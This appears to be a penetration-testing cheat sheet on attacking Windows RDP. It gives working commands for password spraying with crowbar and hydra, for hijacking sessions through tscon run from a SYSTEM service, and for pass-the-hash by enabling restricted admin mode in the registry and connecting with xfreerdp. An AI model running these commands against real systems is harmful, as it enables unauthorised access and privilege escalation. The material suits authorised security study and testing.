Remote Desktop Protocol (RDP) is a protocol developed by Microsoft which provides a user whita graphical interface to connect to another computer over a network connection. Operates under TCP/3389.

Password Guessing

RDP takes user credentials so the common attack vector against RDP is password guessing. Windows instances usually have a password policy that can lead to an account lockout or being disabled after a certain number of failed attempts.

# password spraying attack against the RDP service
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# or hydra 
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

RDP Session Hijacking

If a user is connected via RDP to our compromised machine, we can hijack the user’s remote desktop session to escalate our privileges and impersonate the account. We need SYSTEM privileges to do so.

# view active RDP session
query user
 
# connect to another desktop session
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
 
# create a windows service to execute a binary with SYSTEM
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
 
# start the service
net start sessionhijack

Pass the Hash

If we only have an NT hash of the user obtained from a credential dumping attack and we cannot crack the hash we can still perform an RDP PtH. However, restricted admin mode which is disabled by default should be enabled or we won’t be able to access the computer.

This can be enabled by adding a new registry key DisableRestrictedAdmin under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.

# adding disabledrestrictedadmin reg key
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
 
# connect with a hash
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9